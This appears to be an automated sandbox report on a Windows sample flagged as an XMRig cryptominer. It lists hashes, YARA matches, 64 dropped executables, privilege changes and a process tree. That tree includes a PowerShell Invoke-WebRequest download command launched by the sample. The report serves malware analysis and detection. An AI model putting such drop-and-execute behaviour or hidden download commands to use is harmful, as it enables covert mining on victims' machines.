xmrig | a1116935ab5705a1bc30b11d91d17de68d5cf0ab7e34229e6a8f341553009fa0

Analysis

max time kernel
148s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
27/05/2024, 13:17

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
Size

1.6MB
MD5

6355778231339bd429c8f96613e3a5c0
SHA1

fc3e20640a9c59d4dcfba3ec7700740706f2692b
SHA256

a1116935ab5705a1bc30b11d91d17de68d5cf0ab7e34229e6a8f341553009fa0
SHA512

8184c1f9fcde42978e4aca64fecf99cf7ab5cabe3de6ce7911079f56f886e86ecd510b650dc77e94f88e7a151c8fa76815ae4968c94f9a21de6786ef1fa96652
SSDEEP

24576:zv3/fTLF671TilQFG4P5PMkipfzaCtNcQcAupQF4g6FReQwUzN6Rf0q:Lz071uv4BPMki8CnfZFOzq

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 42 IoCs

miner

resource	yara_rule
behavioral2/memory/1236-144-0x00007FF67E170000-0x00007FF67E562000-memory.dmp	xmrig
behavioral2/memory/2764-600-0x00007FF6797A0000-0x00007FF679B92000-memory.dmp	xmrig
behavioral2/memory/5116-1140-0x00007FF6A84A0000-0x00007FF6A8892000-memory.dmp	xmrig
behavioral2/memory/4804-1139-0x00007FF77B610000-0x00007FF77BA02000-memory.dmp	xmrig
behavioral2/memory/1076-527-0x00007FF6239E0000-0x00007FF623DD2000-memory.dmp	xmrig
behavioral2/memory/1716-392-0x00007FF609EC0000-0x00007FF60A2B2000-memory.dmp	xmrig
behavioral2/memory/4284-397-0x00007FF6E3080000-0x00007FF6E3472000-memory.dmp	xmrig
behavioral2/memory/4696-317-0x00007FF680030000-0x00007FF680422000-memory.dmp	xmrig
behavioral2/memory/4568-294-0x00007FF646940000-0x00007FF646D32000-memory.dmp	xmrig
behavioral2/memory/4596-286-0x00007FF6FEF10000-0x00007FF6FF302000-memory.dmp	xmrig
behavioral2/memory/4960-149-0x00007FF7D9EF0000-0x00007FF7DA2E2000-memory.dmp	xmrig
behavioral2/memory/3244-148-0x00007FF788A30000-0x00007FF788E22000-memory.dmp	xmrig
behavioral2/memory/3868-146-0x00007FF6FD2C0000-0x00007FF6FD6B2000-memory.dmp	xmrig
behavioral2/memory/2504-145-0x00007FF677700000-0x00007FF677AF2000-memory.dmp	xmrig
behavioral2/memory/4564-142-0x00007FF65F8F0000-0x00007FF65FCE2000-memory.dmp	xmrig
behavioral2/memory/400-141-0x00007FF69BD40000-0x00007FF69C132000-memory.dmp	xmrig
behavioral2/memory/4892-140-0x00007FF635F80000-0x00007FF636372000-memory.dmp	xmrig
behavioral2/memory/3316-113-0x00007FF7ED8D0000-0x00007FF7EDCC2000-memory.dmp	xmrig
behavioral2/memory/4564-3808-0x00007FF65F8F0000-0x00007FF65FCE2000-memory.dmp	xmrig
behavioral2/memory/4892-3810-0x00007FF635F80000-0x00007FF636372000-memory.dmp	xmrig
behavioral2/memory/400-3812-0x00007FF69BD40000-0x00007FF69C132000-memory.dmp	xmrig
behavioral2/memory/3316-3816-0x00007FF7ED8D0000-0x00007FF7EDCC2000-memory.dmp	xmrig
behavioral2/memory/988-3815-0x00007FF7A9AD0000-0x00007FF7A9EC2000-memory.dmp	xmrig
behavioral2/memory/4804-3822-0x00007FF77B610000-0x00007FF77BA02000-memory.dmp	xmrig
behavioral2/memory/4960-3824-0x00007FF7D9EF0000-0x00007FF7DA2E2000-memory.dmp	xmrig
behavioral2/memory/1236-3821-0x00007FF67E170000-0x00007FF67E562000-memory.dmp	xmrig
behavioral2/memory/2504-3819-0x00007FF677700000-0x00007FF677AF2000-memory.dmp	xmrig
behavioral2/memory/4596-3830-0x00007FF6FEF10000-0x00007FF6FF302000-memory.dmp	xmrig
behavioral2/memory/3868-3832-0x00007FF6FD2C0000-0x00007FF6FD6B2000-memory.dmp	xmrig
behavioral2/memory/4568-3828-0x00007FF646940000-0x00007FF646D32000-memory.dmp	xmrig
behavioral2/memory/3244-3827-0x00007FF788A30000-0x00007FF788E22000-memory.dmp	xmrig
behavioral2/memory/760-3843-0x00007FF7C8670000-0x00007FF7C8A62000-memory.dmp	xmrig
behavioral2/memory/5116-3856-0x00007FF6A84A0000-0x00007FF6A8892000-memory.dmp	xmrig
behavioral2/memory/4696-3858-0x00007FF680030000-0x00007FF680422000-memory.dmp	xmrig
behavioral2/memory/1716-3860-0x00007FF609EC0000-0x00007FF60A2B2000-memory.dmp	xmrig
behavioral2/memory/4264-3854-0x00007FF7ECA30000-0x00007FF7ECE22000-memory.dmp	xmrig
behavioral2/memory/4284-3853-0x00007FF6E3080000-0x00007FF6E3472000-memory.dmp	xmrig
behavioral2/memory/2764-3848-0x00007FF6797A0000-0x00007FF679B92000-memory.dmp	xmrig
behavioral2/memory/5008-3839-0x00007FF6C7B00000-0x00007FF6C7EF2000-memory.dmp	xmrig
behavioral2/memory/1856-3851-0x00007FF7A3600000-0x00007FF7A39F2000-memory.dmp	xmrig
behavioral2/memory/1076-3847-0x00007FF6239E0000-0x00007FF623DD2000-memory.dmp	xmrig
behavioral2/memory/5004-3841-0x00007FF64CF00000-0x00007FF64D2F2000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
4468	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
988	WtgUGJf.exe
3316	zTVNtxl.exe
4892	WOMYVKx.exe
400	EFuXeiE.exe
4804	rYMrwdX.exe
4564	ZeGWtYI.exe
5004	aTNNbOI.exe
1236	XdYKKLp.exe
2504	BgbOqFC.exe
3868	DsvyXvb.exe
760	ymsoTXX.exe
3244	cGucGZo.exe
4960	PCSfkNJ.exe
1856	KGyfZQa.exe
5008	cuPFAKu.exe
5116	KTGlVSn.exe
4264	eXIfBem.exe
4596	cQtrXHI.exe
4568	epvyLis.exe
4696	ezzCGLz.exe
1716	BZTgRTf.exe
4284	ZblOJuK.exe
1076	dHsgnam.exe
2764	HyaRfxy.exe
2648	gqTeRRr.exe
5092	gkdeBlH.exe
3384	aguuwrk.exe
3364	bsFvKBt.exe
3700	PrbTwWR.exe
2352	ZCdlYUT.exe
904	vjoopEt.exe
1080	rbnOlWo.exe
4508	SFcTSrS.exe
4664	hBoZtKT.exe
2896	RCNMRwD.exe
2816	TfhAgvF.exe
412	MnjaMhU.exe
3864	upnWatf.exe
4472	rAYxINr.exe
3268	xXvBqnv.exe
1428	bhmojZv.exe
2868	PjQjZSK.exe
5072	sSbLDKn.exe
1756	ajzFbKq.exe
3936	ZyIigON.exe
1124	xAUukZk.exe
1580	UTiCrUK.exe
3520	varLakh.exe
2880	wvsRlxg.exe
2768	chYLPSy.exe
3960	LQYkRlA.exe
3696	Qleqily.exe
3704	focZdzF.exe
1860	AdwJPFd.exe
3472	KzmgUiA.exe
1368	iRpRFLd.exe
964	ONOYaaj.exe
388	BVFAMCy.exe
4040	uFihrPo.exe
4320	LsEcJbD.exe
2784	sUktBBO.exe
3168	cdeHPxz.exe
2640	RdxPzWg.exe
648	xTOgqjN.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1688-0-0x00007FF6651A0000-0x00007FF665592000-memory.dmp	upx
behavioral2/memory/988-15-0x00007FF7A9AD0000-0x00007FF7A9EC2000-memory.dmp	upx
behavioral2/files/0x000700000002343b-8.dat	upx
behavioral2/files/0x000700000002343c-7.dat	upx
behavioral2/files/0x0008000000023437-5.dat	upx
behavioral2/files/0x0007000000023442-37.dat	upx
behavioral2/files/0x0007000000023441-34.dat	upx
behavioral2/files/0x0007000000023440-30.dat	upx
behavioral2/files/0x000700000002343f-25.dat	upx
behavioral2/files/0x000700000002343e-22.dat	upx
behavioral2/files/0x000700000002343d-33.dat	upx
behavioral2/files/0x0007000000023457-135.dat	upx
behavioral2/memory/5004-143-0x00007FF64CF00000-0x00007FF64D2F2000-memory.dmp	upx
behavioral2/memory/1236-144-0x00007FF67E170000-0x00007FF67E562000-memory.dmp	upx
behavioral2/memory/760-147-0x00007FF7C8670000-0x00007FF7C8A62000-memory.dmp	upx
behavioral2/memory/5008-151-0x00007FF6C7B00000-0x00007FF6C7EF2000-memory.dmp	upx
behavioral2/files/0x0007000000023450-155.dat	upx
behavioral2/memory/2764-600-0x00007FF6797A0000-0x00007FF679B92000-memory.dmp	upx
behavioral2/memory/5116-1140-0x00007FF6A84A0000-0x00007FF6A8892000-memory.dmp	upx
behavioral2/memory/4804-1139-0x00007FF77B610000-0x00007FF77BA02000-memory.dmp	upx
behavioral2/memory/1076-527-0x00007FF6239E0000-0x00007FF623DD2000-memory.dmp	upx
behavioral2/memory/1716-392-0x00007FF609EC0000-0x00007FF60A2B2000-memory.dmp	upx
behavioral2/memory/4284-397-0x00007FF6E3080000-0x00007FF6E3472000-memory.dmp	upx
behavioral2/memory/4696-317-0x00007FF680030000-0x00007FF680422000-memory.dmp	upx
behavioral2/memory/4568-294-0x00007FF646940000-0x00007FF646D32000-memory.dmp	upx
behavioral2/memory/4596-286-0x00007FF6FEF10000-0x00007FF6FF302000-memory.dmp	upx
behavioral2/memory/4264-231-0x00007FF7ECA30000-0x00007FF7ECE22000-memory.dmp	upx
behavioral2/files/0x000700000002345b-219.dat	upx
behavioral2/files/0x0007000000023455-218.dat	upx
behavioral2/files/0x0007000000023454-217.dat	upx
behavioral2/files/0x0007000000023451-196.dat	upx
behavioral2/files/0x000700000002345f-195.dat	upx
behavioral2/files/0x000700000002345e-194.dat	upx
behavioral2/files/0x000700000002345d-186.dat	upx
behavioral2/files/0x000700000002345c-184.dat	upx
behavioral2/files/0x000700000002344a-183.dat	upx
behavioral2/files/0x000700000002345a-182.dat	upx
behavioral2/files/0x0007000000023459-181.dat	upx
behavioral2/files/0x0007000000023449-178.dat	upx
behavioral2/files/0x0007000000023458-176.dat	upx
behavioral2/files/0x0007000000023452-170.dat	upx
behavioral2/files/0x0007000000023448-165.dat	upx
behavioral2/files/0x000700000002344f-154.dat	upx
behavioral2/files/0x0007000000023453-207.dat	upx
behavioral2/files/0x000700000002344b-193.dat	upx
behavioral2/memory/1856-150-0x00007FF7A3600000-0x00007FF7A39F2000-memory.dmp	upx
behavioral2/memory/4960-149-0x00007FF7D9EF0000-0x00007FF7DA2E2000-memory.dmp	upx
behavioral2/memory/3244-148-0x00007FF788A30000-0x00007FF788E22000-memory.dmp	upx
behavioral2/memory/3868-146-0x00007FF6FD2C0000-0x00007FF6FD6B2000-memory.dmp	upx
behavioral2/memory/2504-145-0x00007FF677700000-0x00007FF677AF2000-memory.dmp	upx
behavioral2/memory/4564-142-0x00007FF65F8F0000-0x00007FF65FCE2000-memory.dmp	upx
behavioral2/memory/400-141-0x00007FF69BD40000-0x00007FF69C132000-memory.dmp	upx
behavioral2/memory/4892-140-0x00007FF635F80000-0x00007FF636372000-memory.dmp	upx
behavioral2/files/0x0007000000023446-137.dat	upx
behavioral2/files/0x0007000000023456-132.dat	upx
behavioral2/files/0x000700000002344d-130.dat	upx
behavioral2/files/0x000700000002344c-128.dat	upx
behavioral2/files/0x0007000000023444-123.dat	upx
behavioral2/memory/3316-113-0x00007FF7ED8D0000-0x00007FF7EDCC2000-memory.dmp	upx
behavioral2/files/0x0007000000023447-103.dat	upx
behavioral2/files/0x0007000000023441-85.dat	upx
behavioral2/files/0x0007000000023443-116.dat	upx
behavioral2/files/0x000700000002344e-101.dat	upx
behavioral2/files/0x0007000000023445-95.dat	upx

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\pRmwJTz.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\xqvBnyq.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\sNeDYzo.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\UqdvSwZ.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\xlADhQR.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\GyOyUVH.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\CQdEcbG.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\pKFraWO.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\CJKNxLH.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\pUFtczW.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\DUEwzuh.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\MgvSlIo.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\XdowLuU.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\wloSsVS.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\KzmgUiA.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\qYQUiHB.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\kBzDZdL.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\imqNLYs.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\rfwLbbI.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\qstDVwg.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\wYTFnnp.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\bKuAUUJ.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\JpeRBcf.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\GrhUgbV.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\ENGxBZd.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\aSDrUrw.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\oOINfix.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\qdChZsq.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\cYLCUUU.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\NexUWpK.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\SaCCfbL.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\wviwgCR.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\lhXpaIP.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\zGpyPMN.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\pIzaFOj.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\DwrVTpe.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\uqvcdRL.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\CWmdnbr.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\tjJDCgm.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\YlVVfyO.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\UrzUvwz.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\EqJcrcK.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\nMFEhEW.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\uDmbtDF.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\CEbJhPm.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\BTjxDVj.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\rmljsHo.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\YoxDwQo.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\EBPbXWU.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\eWKmteu.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\FbzTiso.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\RzGEssv.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\ldOhiZq.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\hxuhuCz.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\wwluANd.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\ouhIGjg.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\QgmTJhL.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\NLJeBEM.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\zTQWMzI.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\pzkEISX.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\znGiyWZ.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\mRVnrJK.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\nZdRRgH.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
File created	C:\Windows\System\JzemuSi.exe	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4468	powershell.exe
4468	powershell.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
Token: SeLockMemoryPrivilege	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
Token: SeDebugPrivilege	4468	powershell.exe
Token: SeCreateGlobalPrivilege	12132	dwm.exe
Token: SeChangeNotifyPrivilege	12132	dwm.exe
Token: 33	12132	dwm.exe
Token: SeIncBasePriorityPrivilege	12132	dwm.exe
Token: SeCreateGlobalPrivilege	4456	dwm.exe
Token: SeChangeNotifyPrivilege	4456	dwm.exe
Token: 33	4456	dwm.exe
Token: SeIncBasePriorityPrivilege	4456	dwm.exe
Token: SeCreateGlobalPrivilege	13644	dwm.exe
Token: SeChangeNotifyPrivilege	13644	dwm.exe
Token: 33	13644	dwm.exe
Token: SeIncBasePriorityPrivilege	13644	dwm.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1688 wrote to memory of 4468	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	82
PID 1688 wrote to memory of 4468	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	82
PID 1688 wrote to memory of 988	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	83
PID 1688 wrote to memory of 988	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	83
PID 1688 wrote to memory of 3316	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	84
PID 1688 wrote to memory of 3316	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	84
PID 1688 wrote to memory of 4892	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	85
PID 1688 wrote to memory of 4892	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	85
PID 1688 wrote to memory of 5004	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	86
PID 1688 wrote to memory of 5004	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	86
PID 1688 wrote to memory of 400	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	87
PID 1688 wrote to memory of 400	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	87
PID 1688 wrote to memory of 4804	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	88
PID 1688 wrote to memory of 4804	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	88
PID 1688 wrote to memory of 4564	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	89
PID 1688 wrote to memory of 4564	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	89
PID 1688 wrote to memory of 1236	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	90
PID 1688 wrote to memory of 1236	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	90
PID 1688 wrote to memory of 2504	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	91
PID 1688 wrote to memory of 2504	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	91
PID 1688 wrote to memory of 3868	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	92
PID 1688 wrote to memory of 3868	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	92
PID 1688 wrote to memory of 760	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	93
PID 1688 wrote to memory of 760	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	93
PID 1688 wrote to memory of 4696	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	94
PID 1688 wrote to memory of 4696	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	94
PID 1688 wrote to memory of 3244	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	95
PID 1688 wrote to memory of 3244	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	95
PID 1688 wrote to memory of 4960	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	96
PID 1688 wrote to memory of 4960	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	96
PID 1688 wrote to memory of 1856	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	97
PID 1688 wrote to memory of 1856	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	97
PID 1688 wrote to memory of 5008	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	98
PID 1688 wrote to memory of 5008	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	98
PID 1688 wrote to memory of 5116	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	99
PID 1688 wrote to memory of 5116	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	99
PID 1688 wrote to memory of 4264	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	100
PID 1688 wrote to memory of 4264	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	100
PID 1688 wrote to memory of 4596	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	101
PID 1688 wrote to memory of 4596	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	101
PID 1688 wrote to memory of 4568	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	102
PID 1688 wrote to memory of 4568	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	102
PID 1688 wrote to memory of 1716	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	103
PID 1688 wrote to memory of 1716	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	103
PID 1688 wrote to memory of 2352	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	104
PID 1688 wrote to memory of 2352	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	104
PID 1688 wrote to memory of 4284	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	105
PID 1688 wrote to memory of 4284	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	105
PID 1688 wrote to memory of 1076	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	106
PID 1688 wrote to memory of 1076	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	106
PID 1688 wrote to memory of 2764	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	107
PID 1688 wrote to memory of 2764	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	107
PID 1688 wrote to memory of 2648	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	108
PID 1688 wrote to memory of 2648	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	108
PID 1688 wrote to memory of 5092	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	109
PID 1688 wrote to memory of 5092	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	109
PID 1688 wrote to memory of 3384	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	110
PID 1688 wrote to memory of 3384	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	110
PID 1688 wrote to memory of 3364	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	111
PID 1688 wrote to memory of 3364	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	111
PID 1688 wrote to memory of 3700	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	112
PID 1688 wrote to memory of 3700	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	112
PID 1688 wrote to memory of 904	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	113
PID 1688 wrote to memory of 904	1688	6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe	113

C:\Users\Admin\AppData\Local\Temp\6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\6355778231339bd429c8f96613e3a5c0_NeikiAnalytics.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1688
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4468
- C:\Windows\System\WtgUGJf.exe
  C:\Windows\System\WtgUGJf.exe
  2⤵
  - Executes dropped EXE
  PID:988
- C:\Windows\System\zTVNtxl.exe
  C:\Windows\System\zTVNtxl.exe
  2⤵
  - Executes dropped EXE
  PID:3316
- C:\Windows\System\WOMYVKx.exe
  C:\Windows\System\WOMYVKx.exe
  2⤵
  - Executes dropped EXE
  PID:4892
- C:\Windows\System\aTNNbOI.exe
  C:\Windows\System\aTNNbOI.exe
  2⤵
  - Executes dropped EXE
  PID:5004
- C:\Windows\System\EFuXeiE.exe
  C:\Windows\System\EFuXeiE.exe
  2⤵
  - Executes dropped EXE
  PID:400
- C:\Windows\System\rYMrwdX.exe
  C:\Windows\System\rYMrwdX.exe
  2⤵
  - Executes dropped EXE
  PID:4804
- C:\Windows\System\ZeGWtYI.exe
  C:\Windows\System\ZeGWtYI.exe
  2⤵
  - Executes dropped EXE
  PID:4564
- C:\Windows\System\XdYKKLp.exe
  C:\Windows\System\XdYKKLp.exe
  2⤵
  - Executes dropped EXE
  PID:1236
- C:\Windows\System\BgbOqFC.exe
  C:\Windows\System\BgbOqFC.exe
  2⤵
  - Executes dropped EXE
  PID:2504
- C:\Windows\System\DsvyXvb.exe
  C:\Windows\System\DsvyXvb.exe
  2⤵
  - Executes dropped EXE
  PID:3868
- C:\Windows\System\ymsoTXX.exe
  C:\Windows\System\ymsoTXX.exe
  2⤵
  - Executes dropped EXE
  PID:760
- C:\Windows\System\ezzCGLz.exe
  C:\Windows\System\ezzCGLz.exe
  2⤵
  - Executes dropped EXE
  PID:4696
- C:\Windows\System\cGucGZo.exe
  C:\Windows\System\cGucGZo.exe
  2⤵
  - Executes dropped EXE
  PID:3244
- C:\Windows\System\PCSfkNJ.exe
  C:\Windows\System\PCSfkNJ.exe
  2⤵
  - Executes dropped EXE
  PID:4960
- C:\Windows\System\KGyfZQa.exe
  C:\Windows\System\KGyfZQa.exe
  2⤵
  - Executes dropped EXE
  PID:1856
- C:\Windows\System\cuPFAKu.exe
  C:\Windows\System\cuPFAKu.exe
  2⤵
  - Executes dropped EXE
